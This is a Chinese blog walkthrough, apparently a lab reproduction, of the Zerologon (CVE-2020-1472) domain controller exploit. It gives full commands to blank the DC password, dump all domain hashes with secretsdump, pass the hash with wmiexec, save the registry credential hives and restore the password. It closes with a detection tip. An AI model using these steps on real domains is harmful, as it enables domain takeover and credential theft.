[内网渗透]—NetLogon 域内提权漏洞(CVE-2020-1472)

简介

CVE-2020-1472 是⼀个 windows 域控中严重的远程权限提升漏洞,攻击者通过 NetLogon,建⽴与域控间易受攻击的安全通道时,可利⽤此漏洞获取域管访问权限(将域控中保存在AD中的管理员password设置为空);其漏洞原理是发⽣在 RPC 认证过程的过程中,由于错误的使⽤了 AES-CFB8 加密所致。

影响版本

可参考:CVE-2020-1472 - 安全更新程序指南 - Microsoft - Netlogon 特权提升漏洞

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

利用场景

获取了一个加入了域的计算机权限,在域普通账号的情况下,将域管密码置空,导出域管hash,然后进行连接

攻击流程

漏洞检测

poc:https://github.com/SecuraBV/CVE-2020-1472

1、获取域控主机名

net group "domain controllers" /domain

获取域控主机名为WIN2012$

在这里插入图片描述

2、检测域控是否存在漏洞

python zerologon_tester.py 域控主机名 域控ip

漏洞存在:

在这里插入图片描述

漏洞攻击

1、将域控密码置空

exp:https://github.com/dirkjanm/CVE-2020-1472

python cve-2020-1472-exploit.py WIN2012 192.168.52.163

在这里插入图片描述

此时如果机器重启则很可能起不来,会出问题

2、secretsdum.py导出域内所有用户的凭证

python secretsdump.py 域名/域控主机名@域控ip -no-pass
python secretsdump.py sentiment.com/WIN2012$@192.168.52.163 -no-pass >1.txt

在这里插入图片描述

3、wmiexec.py远程登录

python wmiexec.py administrator@192.168.52.163 -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634

在这里插入图片描述

恢复域控hash

前边将域控的密码置空了,所以需要恢复一下,否则可能脱域导致整个域环境瘫痪。

1、导出 sam system 等⽂件到本地,获取域控机器上本地保存之前的 hash 值⽤于恢复。

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

在这里插入图片描述

2、将sam文件导入本地

#这里没成功,所以手动拖出来了
get system.save
get sam.save
get security.save

3、删除域控内导出的文件

del /f system.save
del /f sam.save
del /f security.save

在这里插入图片描述

4、通过 sam.save、security.save、system.save ⽂件获得原来域控机器上的 Ntlm Hash 值,⽤于恢复密码

python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

在这里插入图片描述

5、通过拿到 $MACHINE.ACC: 的值,然后进行恢复

脚本:https://github.com/risksense/zerologon/blob/master/reinstall_original_pw.py

python reinstall_original_pw.py 域控机器名 域控ip $MACHINE.ACC后半部分的值
python reinstall_original_pw.py WIN2012 192.168.52.163 beadd583f50a11bac3f8df4c0e7211ea

在这里插入图片描述

6、验证密码是否恢复

python secretsdump.py sentiment.com/WIN2012$@192.168.52.163 -no-pass

再使用开始的secretsdum.py导出域内所有用户的凭证,可见使用空密码去获取域内的所有用户的凭证已经不行了

在这里插入图片描述

后记

在漏洞利用成功后,会在域控中留下4742事件,可用于蓝队检测。

在这里插入图片描述

参考

NetLogon 域内提权漏洞(CVE-2020-1472)复现过程 - 腾讯云开发者社区-腾讯云 (tencent.com)

域内提权之CVE-2020-1472复现打域控_山山而川’的博客-CSDN博客_secretsdump.py下载

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2020-1472是一个Windows域控中的严重的远程权限提升漏洞。该漏洞是由于微软在Netlogon协议中错误使用加密算法而引起的。在进行AES加密运算时,微软使用了AES-CFB8模式并错误地将初始化向量(IV)设置为全零。这使得在攻击者可以控制明文(客户端挑战)和IV等要素的情况下,存在较高的概率生成全零的密文。这个漏洞可能被攻击者利用来远程提升权限,并在Windows域控服务器上执行恶意操作。 为了利用该漏洞,可以使用提供的CVE-2020-1472-exploit.py脚本来攻击目标服务器。该脚本可以通过指定的命令行参数来执行攻击,例如"python3 cve-2020-1472-exploit.py dc$ 192.168.10.10"。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2020-1472 ZeroLogon漏洞分析利用](https://blog.csdn.net/qq_50854790/article/details/123121372)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [CVE-2020-1472 NetLogon 权限提升漏洞](https://blog.csdn.net/qq_53579360/article/details/128923909)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值